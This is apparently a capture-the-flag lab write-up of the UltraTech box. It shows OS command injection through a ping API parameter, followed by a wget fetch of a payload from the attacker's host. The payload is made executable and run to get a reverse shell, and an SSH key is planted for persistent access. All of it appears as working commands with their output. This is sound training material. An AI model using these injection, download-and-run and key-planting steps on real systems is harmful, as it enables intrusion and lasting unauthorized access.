UltraTech_Exploitation

OS Command Injection

---

The target API server provides an endpoint that uses the ping command and it appears to directly pass the user input (ip) on to the OS command as an argument. If there is no input validation in place, it is entire possible to inject an arbitrary command.

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip=`$(id)`#' 
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 61
ETag: W/"3d-2J2mX1i3I4uQhsVi8ABaq24IgPw"
Date: Mon, 22 Jul 2024 16:21:34 GMT
Connection: keep-alive
 
ping: groups=1002(www): Temporary failure in name resolution
 
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(id)`"#'
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 89
ETag: W/"59-6qy5Gtjr20eTzFb0MYoj/K21zN0"
Date: Mon, 22 Jul 2024 16:21:42 GMT
Connection: keep-alive
 
ping: uid=1002(www) gid=1002(www) groups=1002(www): Temporary failure in name resolution

Confirmed!

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(wget+http://10.9.1.180/shell)`"#'
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 375
ETag: W/"177-gmMGpHmD+MVXEqQodI4b/J4sl+4"
Date: Mon, 22 Jul 2024 16:32:52 GMT
Connection: keep-alive
 
--2024-07-22 16:32:52--  http://10.9.1.180/shell
Connecting to 10.9.1.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: ‘shell’
 
     0K                                                       100% 1.73M=0s
 
2024-07-22 16:32:52 (1.73 MB/s) - ‘shell’ saved [194/194]
 
ping: : Name or service not known

Since there is a lot of wrappers and subshell involved, it would be a hassle to send out a properly encoded command. So I will opt out to sending a payload

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(chmod+755+shell)`"#'             
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 34
ETag: W/"22-xMrbEG377Cg2Ba0HleV3ce6BGpk"
Date: Mon, 22 Jul 2024 16:33:08 GMT
Connection: keep-alive
 
ping: : Name or service not known

Making it executable

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(./shell)`"#'
curl: (52) Empty reply from server

Triggering the payload

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.1.180] from (UNKNOWN) [10.10.57.71] 53804
whoami
www
hostname
ultratech-prod
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
    inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2168sec preferred_lft 2168sec
    inet6 fe80::1c:21ff:feb7:f9bf/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www account via OS command injection

It’s not the service account,www-data

www@ultratech-prod:/home/www$ mkdir .ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> ./.ssh/authorized_keys

Writing the public SSH key

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ ssh www@$IP -i ~/.ssh/id_ed25519 
The authenticity of host '10.10.57.71 (10.10.57.71)' can't be established.
ED25519 key fingerprint is SHA256:g5I2Aq/2um35QmYfRxNGnjl3zf9FNXKPpEHxMLlWXMU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.57.71' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-46-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Mon Jul 22 17:07:41 UTC 2024
 
  System load:  0.09               Processes:           105
  Usage of /:   24.3% of 19.56GB   Users logged in:     0
  Memory usage: 80%                IP address for eth0: 10.10.57.71
  Swap usage:   0%
 
 
1 package can be updated.
0 updates are security updates.
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
$ whoami
www
$ hostname    
ultratech-prod
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 9001
        inet 10.10.57.71  netmask 255.255.0.0  broadcast 10.10.255.255
        inet6 fe80::1c:21ff:feb7:f9bf  prefixlen 64  scopeid 0x20<link>
        ether 02:1c:21:b7:f9:bf  txqueuelen 1000  (Ethernet)
        RX packets 5143  bytes 4274297 (4.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4286  bytes 740774 (740.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 640  bytes 54904 (54.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 640  bytes 54904 (54.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Via SSH